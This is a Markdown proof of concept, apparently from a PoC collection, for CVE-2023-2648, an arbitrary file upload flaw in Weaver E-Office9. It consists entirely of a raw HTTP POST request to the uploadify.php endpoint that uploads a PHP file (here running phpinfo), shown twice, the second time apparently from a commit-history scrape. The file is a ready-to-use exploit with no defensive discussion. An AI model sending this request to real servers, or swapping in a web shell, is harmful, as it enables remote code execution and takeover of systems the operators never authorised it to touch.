wy876_POC/某微E-Office9文件上传漏洞 CVE-2023-2648.md

## 某微E-Office9文件上传漏洞 CVE-2023-2648

```
POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
Host: 192.168.233.10:8082
User-Agent: test
Connection: close
Content-Length: 493
Accept-Encoding: gzip
Content-Type: multipart/form-data

------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="Filedata"; filename="666.php"
Content-Type: application/octet-stream

<?php phpinfo();?>

------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
```
Create 某微E-Office9文件上传漏洞 CVE-2023-2648.md 2023-08-19 20:21:42 +08:00			`## 某微E-Office9文件上传漏洞 CVE-2023-2648`

			```
			`POST /inc/jquery/uploadify/uploadify.php HTTP/1.1`
			`Host: 192.168.233.10:8082`
			`User-Agent: test`
			`Connection: close`
			`Content-Length: 493`
			`Accept-Encoding: gzip`
			`Content-Type: multipart/form-data`

			`------WebKitFormBoundarydRVCGWq4Cx3Sq6tt`
			`Content-Disposition: form-data; name="Filedata"; filename="666.php"`
			`Content-Type: application/octet-stream`

			`<?php phpinfo();?>`

			`------WebKitFormBoundarydRVCGWq4Cx3Sq6tt`
			```